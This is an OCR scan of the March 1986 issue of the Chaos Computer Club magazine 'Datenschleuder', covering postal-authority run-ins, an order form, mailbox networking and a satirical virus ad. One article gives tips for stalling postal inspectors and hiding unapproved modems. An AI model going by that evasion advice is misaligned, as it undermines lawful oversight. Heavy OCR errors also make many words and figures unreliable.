steck und Orehwähler sinken. Oer Herr der uns angesprochen
hat fragt sichtlich nervös “Wie sind sie hier hereingekommen
Er kann noch immer nicht glauben, daß wildfremde Leute ohne
Dienstausweis in seine geheiligten Halfen eingedrungen sind.
’Na. durch die Tür!’. ’Oie sind doch zu!“. “Oie durch die wr ge¬
kommen sind wars nicht!'. ‘Welche soll das gewesen sein'’“.
'Na die hinten zum Hof raus!*. ‘Muß wohl jemand nicht richtig
abgeschlossen haben. Was wolfen sie hier überhaupt?“ “Ich will
wissen, ob auf meinen Anschlüssen gemessen wird und was es
soll Datengespräche zu stören*. Es folgt die typische Beamten¬
notantwort; “Darüber bin ich nicht berechtigt Ihnen Auskunft zu
erteilen. Verlassen Sie bitte unverzüglich das Gebäude!*. Er hal
sich inzwischen gefangen, baut sich herrisch vor uns auf und
deutet unmißverständlich zur Tür. Wir wollen es nun doch nicht
übertreiben und lassen uns noch bis aus dem Haus begleiten.
Zum Abschied überreichen wir unserer Sicherheitsbegleitung
einen Chaos-Aufkleber als Andenken. So richtig glauben kann
Ich das. was ich da erlebt habe, eigentlich bis heute noch nicht!
Aber mein Password für die Verbraucherbank habe ich sofort
geändert. Als ich der Dame in der Bank als Grund "Abhören von
BTX durch Unbekannt* nannte, hat sie zwar etwas irritiert ge¬
guckt. aber die Änderung ermöglicht. Zwei Tage später erschie¬
nen die drei Herren vom Gilb persönlich bei LS23. Sie beabsich¬
tigten die funktionierenden Leitungen zu überprüfen. Sie schei¬
terten. da sie es versäumt hatten, sich fernmündlich anzumel¬
den (alle vier Telefonleitungen waren bislang nie gleichzeitig de¬
fekt) und das Horoskop nicht günstig war. Rausgehen durften
sie allerdings alleine.
*★****★★**★
Elektronische Mitfahrzentrale • , „ •
Als erste private Mailbox hat die C.L.I.N.C.H. - Box in
Hamburg als zusätzlichen Service für die User eine
'elektronische Mitfahrzentrale' in Betrieb genommen.
Die elektronls'fche Mitfahrzentrale in der C.LI.N.C.H. -
Box ist natürlich rund um die Uhr unter der Rufnum¬
mer 040 / 632 3517 zu erreichen,
goblln/clinch ds14-e
Redaktion Datenschleuder * Schwencke-85 * 2000 Hamburg 20 * ?:CHAOS-TEAM
Rechnung <riur mit S i ege 1 )/Bes t e 1 )-f e t r en
He.mbur Q , Poet t empe 1 de t >:~
Hiermit wird um Er'füllunQ der
letztlich unberechenbaren U!ün
CCC VW
20
, 0 0
DM
cccFl
ab ;
230
DM
cccNl
1 20
,00
DM
cccSl
60
. 00
DM
cccSO
30
,00
DM
dsFE
2
,50
DM
dsLl
999
,99
DM
dsFl
ab :
1 00
DM
dsNl
60
,00
DM
dsSl
30
,00
DM
dsHO
60
,00
DM
dsHl
33
, 33
DM
dsKlO
3
, 33
DM
dsKCC
1
, 00
DM
dsAbh
3
, 33
DM
dsKop
-
,30
DM
PV4
4
, 00
DM
FVT
???
,??
DM
i efere
deshalb:
V-Scheck
DM
Br f ma r
kn
,05
DM
Brfmark.n
,50
DM
Brfmar
kn - j
, 80
DM
im "(01 gen den s t ü.ck za.h 1 mäf-i 9 spezi-fizierte*
sehe gebeten.
Beiträge Uerein zur Förderung des CCC
Au-fnahmegebühr (einmalig, Verwaltung)
gewünschte Lei tstel 1 ennummer : _ <.*)
Förderndes Mitglied bis 3l.Ei.tiC'
Normales Mitglied bis 31.S.36
Schüler u.ä. bis 31.8.86
Schüler u.ä. bis 28.2.86
naturgemäß porto-frei und unverpackbar
Chaos-Jahr endet mit Schalttag oder nicht
Probeexemplar ds-aktuell
Ein Abo bringt Unbekanntes o-fter!
Lebensabü ds (wer oder was lebt länger"’)
Förderabo 8 Ausgaben (1 Jahr)
Jö,hresabo B A. Norme 1 verdi ener
Sonderabo 8 A. NUR Schüler u.ä.!!!
Sonderabo und Hackerbibel Teil 1
dsPE-dsHO jeweils inkl. Porto/Verp.
Hackerbibel Teil 1
Je 10 Kleber CCC Kabelsalat spriwasge.
1 Kleber Chaos Cnoten wasser-fest
6 ^ Kleber Achtung Abhörgefahr
pro Stück Fütokopien aus dem Archiv leut
beiliegender Liste ( nur für Redakteure )
Porto und Verpackung Hackerbibel
Porto, Verpackung, Trinkgeld -für den Rest
,_ Versand er-folgt nach Geldeingang
o»
<j>
O
10
<X)
05
n
E
a
it
Uli th i n-f 1 ati on ,
wei^e an even betten buyl
_ und in ■folgender Form:
da.s sind zusamrTien
DM
Alls rfordrlch btt sorg-fttg aus-flln!
_ Nchts wchtgs wglassn! ! !
Ulr habn sehn gnug zu tun mt Vrwal tngsschß!
Abs Datenschleuder 2HH20 C9927F
! ! <-- Hier Adresskleber befestigen
! ! zwei terf anheften zum Verschicken
! ! fallsnichtrmind.l Dl-i T r i n k c- e t d
! ! Aufschlag für Mehrarbeit und
! ! <— Adresse hier links lesbar ^
! ! ein tragen! ^
! ! Hier Datumstempelplatz für Verwaltung v
1_!_V_V_V_
Formblatteinganö Geldeingang Auslieferung Archivierung VernichtUrig
<*) Lei tstell ennummer umfaßt c*. 4 Zi-f-fern. Stelle 1*2 ist iei-VorwähT
<WV4 40, Betriin 30, Kiel 43 ^ c v,u«4 ^ »r--e c.\ a_
Chaos
Communication
Congress ’85
Die Europäische Hackerparty
am 27.-29. Dezember 1985
Eidelstedter Bürgerhaus,
Elbgaustraße 12,2000 Hamburg 54
10.00-18.00 Uhr
Was heute noch wie ein Märchen klingt, kann Morgen Wirklichkeit sein. Hier ist ein Märchen von
Übermorgen. Es gibt keine Kupterkabel mehr. Es gibt nur noch die Glasfaser und Terminals in
jedem Raum. Man siedelt auf fernen Rechnern. Die Mailboxon sind als Wohnraum erschlossen.
Mit heute noch unvorstellbaren Geschwindigkeiten durcheilen Computer-Clubs unser Daten¬
verbundsystem. Einer dieser Computer Clubs ist der Chaos Computer-Club. Gigantischer Teil
eines winzigen Sicherheilssystems. das die Erde vor der Bedrohung durch den Gilb schützt.
Begleiton wir den CCC und seine Mitglieder bei ihrem Patrouillendionst am Rande der
Unkenntlichkeit.
DAS Treffen für Datenreisende! Telefon, Datex, Btx, Mailboxbetrieb,
Telex, Datenfunk, Videovorführung.
Aktive Workshops. Video- & Papercopiers
Eintritt: Mitglieder DM 20-
Private Kongressteilnehmer DM 30,—
Presse DM 50,—
Gewerbliche Teilnehmer DM100,—
Voranmeldung durch Überweisung
auf Postgiro 5512 57/204 PschA Hamburg
Sonderkonto C/S. Wemöry
Programm des Jahres 1986
Viromat plus
Zum Ejnführungspreis von DM 19,97 ist jetzt der Viromat Plus
Version 0.0 für verschiedene Rechner erhältlich — dos Muß für
jeden Hacker.
Oos Neue Hacker-Universollexikon zum Thema:
“Viren (lot), sehr kleine, im Ultramikroskop slchlbore, gonz oder
zum größten Teil aus Bitketten bestehende Körper von kugel-
bls stäbchenförmiger Gesfolt (0 bis 1), parositor, oußerordent-
lich virulent. Wenig differenzierte Kronkheitserreger (z. B.
Croyppe, Poliovoxitis, Masern64). An der Grenze zwischen be¬
lebter und unbelebter Intelligenz; Vermehrung nur im Wirtsre*
glsterberelch; viele Viruserkronkungen erzeugen lebenslöngli-
che Immunität, daher vorbeugende oktive Immunisierung viel'
loch erfolgreich.”
Für eine Douer von 6 Monoten und bei normoler Anwendung
wird gewährleistet, doß Material und Herstellung der Diskette,
auf der Ihr Virus gespeichert ist, frei von Fehlern sind. Do es
nach gegenwärtiger Technik nicht möglich ist, einen Virus so zu
entwickeln, daß er, insbesondere im Zusammenhang mit onde-
ren Viren, fehlerlos arbeitet, entfallt jegliche Garantie. Normo*
lerweise betrögt der lythische Infektionszyklus etwo 30 Nano-
johre und bewirkt dauerhofte Viroimmunitöt.
viromol 5.WS 851218
Telecontrol — wie geht das?
Mit sechs Tosten von "sehr schlecht” bis "ausgezeichnet" können
von Medienkontrollfirmen bezahlte Fernsehzuschouer dos Pro¬
gramm bewerten. Eine Konfrollmaschine mit Telefonanschluß
und Modem steht in den betreffenden Wohnzimmern. Im Dun¬
kel jeder Nacht ruft der Dotensammelcomputer dort an und die
Doten ob. Sie werden aufbereitet und am nächsten Tag ob elf
Uhr kann ein kleiner Haufen Medienkontrolleure dotenmößig
obrufen, wer was gesehen hat.
Die lassen sich den Spaß zweistellige Millionensummen pro Johr
kosten, damit — verkürzt ousgedrückt — der Vizepräsident
eines Getränkekonzerns mit weltweitem Abfüllsystem auf
einem Kongreß in Hamburg verkünden darf, daß sie für Fern¬
sehwerbung in der BRD nur 44% des lokalen Budgets ausgeben,
in Brasilien dagegen 90%. Bei uns seien während der "ungünsti¬
gen" Werbezeit nur rund 28% der Berieselungsmaschinen an¬
gestellt. Da suchen die Konzerne sich etwas anderes für die
Werbung. Im Moment entbrennt der Kompf um die TV-Satelli-
tenparkplötze om Himmel.
"Der Mensch konsumiert Informationen, die er nicht mehr über¬
blicken, geschweige denn kontrollieren kann. Seine kommunika¬
tiven Fänigkeiten verkümmern" schreibt eine politische Wo¬
chenzeitung.
telcfllS.ws 851220
Postprüfplaleetten Produktionsbe¬
ginn
Zum ersten Jahrestag der Btx- Fernmelderechnung von über
130.000 DM wird die gute (?) alte (!) Ffz- Nummer durch das
neue "DBP- Zulassungszeichen" ersetzt. Wer noch Gerate mit
Ftz-Nummer hot, muß nicht besorgt sein, daß diese vom 1. April
an nicht mehr den zum Teil unberechtigten Vorschriften der DBP
entspricht, denn "die bisher vergebenen FTZ-Nummern gelten
weiter, solange die Zulassungen nicht erlöschen und widerufen
werden”.
So sieht das neue Zeichen aus:
Ober kurz oder lang wird das gute (!) alte (1 (aber (noch) nicht
veraltete...)) Dotenklo eine Ftz* Nummer (sorry) ein DBP- Zu-
lossungszeichen erholten. Denkt darüber nach, wie sich dieses
Zeichen am effizientesten per Computer und Matrlx/Laser-
drucker erstellen läßt, damit Ihr eure Klo's mit Testausdrucken
topezieren könnt.
Weiter im (Post-)Text: "Nöhere Einzelheiten zur Kennzeichnung
zugelossener Fernmeldeeinrichtungen können dem Amtsblatt
128/1985 entnommen werden."
ZZFLl-1 B3240voml3.11.1985
P.S.: Die Vorschriften über die Wischfestigkeit von Ftz-Num-
mern bzw. DBP-Zulassungszeichen sind im Gegensatz zu den
Vorschriften, die die Technik betreffen, nicht genügend defi¬
niert, da es schon zu Beschlagnahme eines Akustikkopplers Typ
Dataphon S-21D gekommen ist, well die Ftz-Nummer durch
höufigen Gebrauch stark verwischt war und die Polizei deswe¬
gen bezweifelte, daß der in dsl4 genonnte Koppler überhaupt
eine besitzt.
e5Co/ls38
/xi/ws/ftzneul5.w5 860323 1522
die datenschleuder 15, März 1986
das wissenschaftliche fachblatt für datenreisende
D-2000 Hamburg 20
Schwenckestraße 85
Geonet: Geol :Chaos-Team
Brett Dotenschleuder
Btx: -^055321^
Herausgeber und ViSdPG
Herwart Holland-Moritz
Mitarbeiter dieser Ausgabe (u.o.)
R. Schrutzki, S.Wernery, A.Eichler, P.Franck, H.Gruel, M.Kühn
Eigendruck im Selbstverlog.
Mörz 1986
Blx 655322
Seite 1
Trara — die Post ist da!
Hinweise für Ausfälle der dritten Art
Datensch1euder
15 = März 1986
oeite 2
Trara — die Posi ist da
Hinweise für Ausfälle der dritten Art
Der Redoktion sind in letzter Zeit vermehrt Berichte zugegan¬
gen, aus denen Idar hervorgeht, daß immer noch gewisse Unsi¬
cherheiten herrschen, wenn es um den Umgang mit dem grö߬
ten Dienstleistungsunternehmen in diesem unserem Lande geht.
Wir wollen daher noch einmol zusammenfassen, wie man sich
tunlichst zu verhalten hat, wenn es zu staatlichen Ausfällen wg.
Postkommt. ...... . ,
Oberster Grundsatz ist auch hier: keep cool! Nichts wird so
heiß gegessen, wie es gekocht wird und man kann viel Unheil
abwenden, wenn man sich informiert, bevor irgendwelche Kin¬
der in ominöse Brunnen fallen. Wer sich nicht sachkundig
macht, bevor er zum Beispiel ein Modem anschließt, handelt
grob fohrlössig und müßte eigentlich wegen Dummheit noch
eins obendrour kriegen.
Grundlage für alles Handeln der Post ist In unserem speziellen
Fochgebiet die Fernmeldeordnung mit den dazugehörigen
Verwaltungsanweisungen. Letztere sagen aus, was mit den
Paragraphen der FO wirklich gemeint ist. sie sind also für uns
besonders wichtig. Wer dafür genügend Kohle locker machen
kann, sollte sich den Kram bestellen, wobei es sehr unfein ist. die
Leute im nächstbesten Telefonlädchen deswegen in Verlegen¬
heit zu bringen. Bestellt den Krom beim zuständigen Fernmel¬
deamt, die Verwaltungsbeamten da wollen \o ouch mal was an¬
dres tun. Wer sich dos nicht leisten kann, muß mit unseren Tips
zufrieden sein.
Es gibt drei Stadien von postolischen Ausfällen. Nummer eins ist
ein überraschender Anruf: 'Müller, Fernmeldeamt brabbel...
wir haben festgestellt... usw’. In diesem Fall empfiehlt es sich,
dem netten Beomten die FTZ.Nr. des eigenen Kopplers mitzutei¬
len und Ihn darauf hinzuweisen, daß man ausschließlich mit die¬
sem Gerät tätig wird. Sollte er den Verdacht, man benutze un-
postalische Gerate, wiederholen, empfiehlt sich die Papageien-
taktik: 'Ich sagte doch bereits, ich benutze ausschließlich einen
Koppler mit der FTZ.Nr. 18.13.1808.00 der Firma E....' Gegebe-
nen/olls so lange wiederholen, bis der nette Herr aufgibt.
Stufe zwei zuendet mit einem überraschenden Schellen der Tür¬
glocke. Zwei bis drei nette Herren präsentieren ihren Dien¬
stausweis und bitten mehr oder weniger höflich um Zutritt. Emp¬
fohlene Reaktion: Höflich um nähere Betrachtung der Ausweise
bitten. Falls dos Ansinnen abgelehnf wird, Zutritt verweigern,
die Herren sind verpflichtet, sich auszuweisen. Ausweise sorg¬
fältig prüfen (in der Zwischenzeit besteht Gelegenheit für zufäl¬
lig anwesende sachkundige Besucher, aufzuroumen). Besonde¬
res Augenmerk auf die Gültigkeit der Ausweise richten, dos
Verfalldatum ist noch vor dem Namen des Inhabers vermerkt.
Bei ungültigem Ausweis: Zutritt verweigern. Bestehen hinsicht¬
lich der Ausweise keine Bedenken, einen Blick auf die Uhr wer¬
fen. Zutritt braucht nur während der üblichen Geschäftszeiten
gewährt zu werden. Das legen wir einmal bankmäßig aus und
verwehren in der zeit von 18.00 bis 07.00 uhr ohnehin den Zu¬
tritt. Sodonn fragen wir die Herren, ob sie sich ongemeldet hot¬
ten. Wird dies verneint, oder ist sicher, daß eine Anmeldung
nicht erfolgt ist, drücken wir unser Bedauern aus und verab¬
schieden die Herren. Sehr hilfreich ist dabei die Floskel: 'Es tut
mir [O ausgesprochen leid, aber meine Frau (Freund(in),ßekann-
te(r)) is grod unter der Dusche.. .kommen sie doch n andermal
wieder, ja ?’
Stufe drei ist die gefährlichste, hierbei erscheinen wiederum
mehrere Herren, diesmal ist ober auch jemand von der Stoot-
sanwaftschoft dabei und präsentiert zusätzlich zum Ausweis
einen richterlichen Durchsuchungsbeschluß. Hier hilft eigentlich
nichts mehr, außer man ist vorgewamt und vermeidet diese
Konfliktsituation, indem man nur während dere/gent/ichen ße-
triebszeit die Anlagen angeklemmt hat.Zu jedem anderen Zeit¬
punkt sollte eine ordnungsgemäße Fernsprechanlage vorhan¬
den und angeschlossen sein..
Noch etwas: Beschlagnahme von Geröten kann in jedem Fall
nicht durch die Post erfolgen, sondern nur durch Polizei oder
Stoatsanwoltschaft. Postler hoben die Anvveisung: 'Die nicht
ordnungsgemößen Geräte werden dem Teilnehmer unter Hin¬
weis auf sein Fehlverhalten ausgehändigt'.
Es gibt zusätzlich noch eine Reihe von Moßnohmen, die man
treffen kann ,um im Falle eines Falles gewappnet zu sein:
- alle Anschlußdosen der Post sollten im Flur ongebrocht sein,
die Post darf nur die Räume betreten, in denen Fernmeldeein¬
richtungen vorhanden sind. Im Bedarfsfall donn dos Telefon in
den Flur stellen.
- wenn immer möglich, Dosenanlagen verwenden. Das kostet
zwar ne Markfuffzich im Monot extra, ist ober praktisch, da
man im Bedarfsfall nur umstecken muß.
- keine Eingriffe in den Postapparat. Lieber im ßastelloden ein
Amitelefon für 20.- DM kaufen und daron bostein. Im Falle eines
Falles steht immer ein ordnungsgemäßes Gerat parat. Ist unbe¬
dingt zu empfehlen, wenn man mit Dosenanlage arbeitet.
• falls das nicht möglich ist, wenigstens ein paar Plomben fürs
Telefon bereithalten und notfalls den Apporot neu versiegeln
lassen.
/xl/ws/frpostl 5,ws 860213 2210 goblin
Alltagserfahrung eines Hackers
Wo bitte gibts eine NUi?
Alltagserfahrung eines Hackers
Wo bitte gibts eine NUI?
"Nun war ich es leid . Wieder war eine mühsom erkämpfte nui
gesperrt worden, Warum wochenlang warten, um in den Ge¬
nuß der Datenbanken und Netzwerke in oller Welt zu gelon-
gen? Ich beschloß, mir gonz offiziell eine Nui zu besorgen.
Gesagt-geton, auf zum nächsten Postamt. Da Ich in Homburg-
Bramfeld arbeite, mußte ich mit einem relotiv kleinen Postamt
vorlieb nehmen. Rein in den Loden, oho, hinter dem Schölten
sitzt einer, der nicht ganz den stumpfen Postlerblick draufhol.
"Guten Tag, ich möchte gerne eine Nui für Dotex-P beontro-
gen!" sagte ich mit freundlicher Miene. "Datex- WAS?”, kom es
aus dem Munde des guten Mannes. Ich erklärte ihm kurz mein
Begehren. "Nee, dos gibt s hier höchstens am Poketschalter."
Na gut, bei Datex werden ja auch Pakete verschickt. Also ouf
zum Poketschalter. Ein blonder Engel hinter dem Schalter lä¬
chelte mich erwartungsvoll an. Erneut trug ich meinen Wunsch
vor. "Nein, dia müssen Sie an Schalter 1 gehen!", erwiderte sie
mit verwirrtem Gesicht.. "Sorry Lady, da komme ich gerade
her." Sie erklärte mir, ich möge kurz warten, do sie ihren Chef
onrufen wolle. Als sie diesem dann erklörfe, hier wolle ein Kun¬
de Datex-P beantragen, bin ich in schallendes Gelochter aus¬
gebrochen, was mir böse Blicke sämtlicher Postler einbrochte.
Mon erklärte mir, der Chef würde gleich zurückrufen, ich solle
kurz warten. Nach ungefähr 5 Minuten ein Rückruf. Um weitere
Mißverständnisse auszuschließen, wurde ich direkt mit einer
netten Dome vom Fernmeldeamt verbunden. Endlich wußte je¬
mand Bescheid.
Ein kurzes Gespräch brachte den gewünschten Erfolg: om
nächsten Tag lag ein Antragsformulor bei mir im Briefkosfen. So
schnell funktioniert es (manchmal) bei der Post. Postwendend
schickte ich das ousgefüllte Formular zurück, auf Antwort worte
ich allerdings noch immer. Zum Ganzen kann ich nur eins so¬
gen; "Pattex-D: Ausloesung — Anforderung durch Klebestelle"!
Ich wünsche Euch mehr Erfolg, falls Ihr ähnliches Vorhaben soll¬
tet" schreibt MAGIC an die Redoktion.
nuineulS.ws 860204 7000 magic
Kinder sind Chaoten
... sie springen bei jeder Gelgenheit aus den für sie pröporier-
ten Entwicklungsmustern heraus, zerstören die die Entwicklung
gründenden Ordnungen, greifen sie an,.. .
Vor der Schulstunde
... Erst dann, wenn Du sicher bist, alle zu beherrschen, kannst
Du mit dem Unterricht anfangen.
... Die tägliche Houptarbeit richtet sich gegen die Schüler. Sie
findet nicht mit ihnen statt. Der Schulunterricht hat durchaus
Neue Aboabteilung
Nach dem Abdonken der bisherigen Aboabteilunq wegen frei¬
williger Oberlcstung gab es Monate der postmäßigen nullna¬
hen Grenzlätigkeit. Dazu kam allgemeine Überlastung, auch
derCCC'85 hat einen Haufen Arbeit Gemocht.
Dabei ist eine Menge Post liegengeblieben (Standordfrage am
Telefon: "Liegt die Bestellung mehr als drei Monate zurück? ].
Jetzt hat die neue Aboobteilung die Verarbeitung eingehender
Daten steuernd aufgenommen.
Die frische Lieferung Hackerbibeln (im guten Buchhandel unter
"Betriebssystemen” zu finden) wird, nun postgenehmigt, als ßü-
chersendung verschickt (Eben beschwerte sich noch einer, wo
seine Hackerbibel blieb, d.s.).
Die neue Aboabteilung ist stolz darauf, in der letzten Woche
nicht nur tagesaktuell geworden zu sein, sonden — wegen
gleichzeitigen Aufräumens einiger Privatstapel — auch ältere
Posthäufchen bearbeitet zu haben.
Züge von Grabenkrieg. Beide Seiten hoben sich eingerichtet.
... Geschrei ist kein Herrschaftsinstrument. Es enthüllt die Hil¬
flosigkeit.
Unsichtbare Überwachung
. .. Unsichtbarkeit Ist Bedingung für das Funktionieren des
Oberwachungssysfems.
.. . Kein kommunikotiver Akt. der nicht unter den Augen des
Lehrers (oder sonstwem, Anm. ds) vollzogen werden müßte.
Kommentar der Redaktion:
Ein Buch, dos Einschränkungen informationeller Selbstbestim¬
mung im Alltag gut beschreibt. Die Verollgemeinerung vom
Lehrer hinter den Rücken der Klasse zur unsichtbaren Überwa¬
chung bei Telefon und Telekommunikotion etc. muß der Leser
leisten. Schon die gut gegliederte Lehreronalyse mocht dos
Werk zu einem Hondbuch im Grobenkrieg für beide Seiten, ct-
do
Schulszenen. Vom Herrschen und vom Leiden.
Friedrich Thiemonn.
ISBN 3-518-11831 *3 DM 1 0, rund 4 Pfennig pro KB.
Der älteste Brief stammte aus 1984.
altpstl 5.WS 860226 0030
Die Wüste lebt
Deutschlonds Mailboxscene gerät in Bewegung. Aus den ein¬
zelnen Dotenoosen In den Stödten und Dörfern sollen sollen
blühende Informotionsfelder für olle werden. Notwendig Ist do-
bei in erster Linie, doß die Betreiber der lokolen Systeme eine
Möglichkeit hoben, Informationen auszutauschen Bereits auf
den 7. Hessischen Computertagen in Neu-Isenburg bei Frank¬
furt im September letzten Johres trafen sich die engogierten Sy-
sops einiger privoter Bulletin ßoords, um Erfohrungen auszu¬
tauschen und Wege zur Zusammenarbeit zu finden. Es stellte
sich dabei heraus, daß es vorrangig wichtig ist, ein Informa-
tionsmedium zur Verfügung zu hoben, daß es dem einzelnen
Betreiber ermöglicht, preisgünstig Informotionen on die ande¬
ren weiterzugeben. Konsequenterweise konn so etwas nur über
Dolex laufen; die Errichtung eines entsprechenden Systems
oder die Nutzung eines solchen ist also Voraussetzung für so
ein Projekt.
Auf dem CCC85 wurden diese Probleme dann konkreter ange¬
packt, der Tog des Sysops brachte eine Reihe fruchtbarer Ge¬
spräche, on deren Ende der Pion stond, InterPoolNet zu grün¬
den. Aufgabe dieses Vereins soll es sein, die Telekommunikation
in freundschaftlicher und völkerverstöndigender Weise zu för¬
dern. Im Klartext heißt dos, daß jeder, der Informationen hot,
diese einen großen Topf werfen kann, ous dem sich alle Ver¬
einsmitglieder bedienen können. Auf diesem Wege wird den
Sysops ein Instrument in die Hand gegeben, das dem Otto
Normaluser den Zugong zum Weltdatennetz beitet. Aktuelle
Irifromationen können so aus den entlegensten Teilen der Welf
direkt an den interessierten Benutzer eines lokalen Bulletin
Boards gelangen.
Wir berichten in einer späteren Ausgabe über IntePoolNet,
wenn der Verein die ersten technischen und rechtlichen Hürden
genommen hot.
/xi/ws/inferpIS.w! 19860204 22051
gobiin
KURZMELDUNG
Datenschutz bei Bestellungen an den CCC
"Liebe Chaoten, ich möchte eure Datenschleuder obonnieren.
Anbei ein V-Scheck über 30,- DM und eine Studienbescheini¬
gung." heißt es in einem Brief an die Redaktion.
Die beigefügte "Immatrikulotionsbescheinlgung" sieht aus wie
ein Schweizer Käse. Unter der Nomensreile klafft dort, wo Ge¬
burtsdatum und -ort (19 Zeichen) standen, ein Loch. Auch acht¬
stellige Matrikelnummer und dos Semester der Erstimmatrikula¬
tion sind säuberlich ausgeschnitten. Beim "Fachsemester”
schnitt der Absender ein zulcleines Loch: es sind weniger als 10.
DerStudiengang "Physikalische Technik” wurde nicht zum Köse-
ioch. Der Abonnent wird deshalb als angehender Fachmann auf
diesem Gebiet bei uns registriert" meint die Aboabteilung.
postwel 5.WS 860226 0006
Perverse Staubsauger?
Beim Reinigungsversuch einer ßlM-Kugelkopfschreibmaschine
mit einem Staubsauger wurde das Farbband mit derariger
Wucht ausgefädelt und eingesougf, daß sin Herousziehen des¬
selben noch dem Ausschallen nicnt mehr möglich war und dos
Farbband durchgeschnitten werden mußte, domit die einge-
saugten Meter im Staubbeutel verschwinden konnten.
staubsau.w« 8&01 ^ & 1 &T T wau
Datensch1euder
15 = Mars 1986
Das wissenschaftliche Fachblatt Für Datenreisende
Ein Organ des Chaos Computer Clubs
CCC-lntern, HAMBURG. ■— Als Nachwehe des Chaos Comuni-
cotion Congresses im Dezember letzten Jahres landete ein Teil
des CCC-Archlves im nächsten Papiermüllcontainer. Durch ra¬
sche Hilfe Icommunoler Müllmenschen konnte der Schaden be¬
grenzt werden. Dte Handbücher zur Polizeiverwendung wurden
wiedergefunden. Derzeit wird das Material aufgebügelt.
SCHECKKARTEN KÖLN — "Zwei Kölner haben durA Manipu¬
lationen on Geldautomaten einen Schaden von 80.000.- DM
verursacht. Der für den technischen Teil „verantwortlich* be-
zeichnete sich in der Vernehmung als „Computer-Freak*. Er ha¬
be die Arbeit am Heimcomputer als Hobby betrieben. Zu den
Experimenten mit Scheckkarten sei er durch eine Fernsehsen¬
dung angeregt worden." So die Pressestelle der Polizei In Köln
am 29.1.86.
Auch beim CCC in Homburg laufen Anfragen von durch Manl-
pulotiooen betroffenen sowie von wissenschaftlich Arbeitenden
zu diesem Themenbereich auf. Ein Beitrag über Technik und ge¬
setzliche Grundlogen ist für die HAßl Teil 2 vorgesehen (next
year).
AKTIVITÄTEN — Für Datenschleuder 16 ist eine Obersicht von
Adressen, Gruppen und Treffen Datenreisender geplont. Alle
Gruppen seien gebeten, eine kurze Seibsfdorsfellung über ihre
Anliegen, Kontaktadresse und elektronische Anschrift on die
Leitstelle 1188 einzusenden.
POST BONN — Das Referat 2640 des Bundespostministeriums
stellte zum November 85 den Entwurf zur Telekommunikation¬
sordnung (TKO) vor. Wichtigste Neuerung ist die Unterschei¬
dung zwischen „Anschluß" (die Dose von der Post) und „Endstel¬
le* (Akustikkoppler, Modem oder Telefon!}, wobei die Endstelle
auch feilnehmereigen sein konn. Die Endstelle (Telefonapparat)
oder Teile (Gebührenzähler) davon sollen zukünftig keine for-
molen Bestandteile des Anschlusses sein. Der Anschluß wird da¬
nach unterschieden, ob er eine „einfache Endstelle* oder aber
für eine „Anlage", die Vermiftlungs-, Verteil-, oder Konzentra¬
torfunktionen übernimmt (Mailbox?), bestimmt ist. Danach, und
nach den in Anspruch genommenen Vermittlungs- u. o. Verteii-
dienstlelstungen z. B. Bildschirmtext, Teletex oder ISDN sollen
die Gebühren berechnet werden. Wer seine HARDWARE nicht
von der Post bezieht, spart.
Wie bisher sollen private Endeinrichtungen (Datenklos, Mo¬
demkarten), die eine Teilnahme am öffentlichen Telekommuni¬
kationsdiensten ermöglicht, zugelassen sein. Zuständig ist wei¬
terhin das ZZF, das eine „Benutzungserlaubnis" erteilt. Die DBP
wif/ [edoch für eine Reihe von Endstelleneinrichtungen Ausnoh-
men zulassen. Eine „Verwaltungsanweisung* regelt näheres. Es
ist z. B. sich das Recht auf Abschaltung bei Mängeln vor.
Die TKO soll 1988 die Rechtsgrundlage für eine längst überfälli¬
ge liberolisierung im Fernmeldewesen schaffen. Die geplanten
Änderungen sollten aber nicht davon oblenken, daß in diesen
Tagen immer noch Mailboxbetreiber, die mit ungeprüftem Ge¬
rät arbeiten, Besuch vom Gilb erhalten.
Dieses als kurzer Abriß, mehr später! LS23
Steffl 15 .WS 860323 01
Kleine Fische
Intermail — Vernetzung der lokalen Systeme
Zukunftsorientierte Dotenkommunikation betreiben bedeutet
heute, an der Schwelle zum Informatfonszeitalter, daß die Ver¬
netzung der bestehenden Systeme vorangetrieben werden
muss. Umfassende Information setzt umfassende Vernetzung
der verschiedensten Informationsysteme voraus. Bislang woren
die sogenannten Low-Cost-Sysfeme, olso von privat betriebene
Mallboxen auf Home- und Personalcomputern von dieser Ent¬
wicklung ousgeschlossen. Das soll sich schon In nächster Zu¬
kunft ändern, um ouch dem Ötto Normaluser’ die vernetzte
Welt der Daten erschließen.
Bereits seif einiger Zeit existiert in Hamburg eine lose Gruppie¬
rung von Betreibern privater Low-Cost-Boxen, die unter dem
Nomen ßulietinboord Service Hamburg versucht, Ordnung ins
Chaos zu bringen und durch gemeinsame Anstrengungen der
Sysops Schritte in dieser Richtung zu machen.
Auf dem CCC85 wurde erstmols ein Vorschlag zur Vernetzung
der lokalen Systeme mit dem Arbeitstitel ’lntermall’ vorgestellt.
Es handelt sich hierbei um ein Konzept, dos Innerholb der kom¬
merziellen Mallboxsysteme bereits realisiert ist und dort zu den
Standarddienstleistungen gehört. Intermail erlaubt dos Versen¬
den persönlicher Nachrichten an andere User, ohne daß diese
zwangsläufig in allen lokalen Boxen vertreten sein müßen. Es
genügt völlig, in einer Mailbox als Benutzer eingetrogen zu
sein, um von jedem anderen User der anderen Boxen onge-
schrieben werden zu können. Der Vorteil liegt auf der Hond.
Wer bisher als engagierter Nutzer der lokalen Systeme gez¬
wungen war, mehr oder weniger regelmäßig in allen Boxen ver¬
treten zu sein, kann sich nunmehr darouf beschränken, die für
ihn persönlich wichtigsten onzurufen.
Technisch realisiert wird Intermall durch einen eigensföndigen
Rechner, Intermailcontroller oder kurz IMC genonnt. Dieser
fragt regelmäßig zu festgelegten Zeiten die lokalen Systeme
auf vorhanden Intermail ab, verarbeitet diese und verteilt sie
wieder. Natürlich kostet so etwas Geld, In einem regionalen
Netzwerk mit zehn Mailboxen fallen bei täglichem Update
durch den IMC rund 130.- DM pro Monat on, selbst wenn keine
Nachricht verarbeitet werden muß. Daraus folgt zwangsläufig
der Schluß, daß Intermail nur dann sinnvoll ist, wenn ousrei-
chend zahlende User daran teilnehmen. Nach Schötzungen der
Homburger Arbeitsgruppe funktioniert Infermoil kostendec¬
kend, wenn rund dreißig User mit monatlichen Beitrögen von
vier bis fünf DM dabei sind.
In der Praxis sieht die ganze Geschichte nun so ous, doß dos
Konzept Intermail bereits weitgehend realisiert ist. Die ersten
Probeläufe sind abgeschlossen und bis spätestens Mitte Fe¬
bruarwird Inlermail in Homburg als Dienstleistung für die Nut¬
zer der privoten Systeme zur Verfügung stehen. Selbstverständ¬
lich wird dos Intermail-System allen interessierten Betreibern
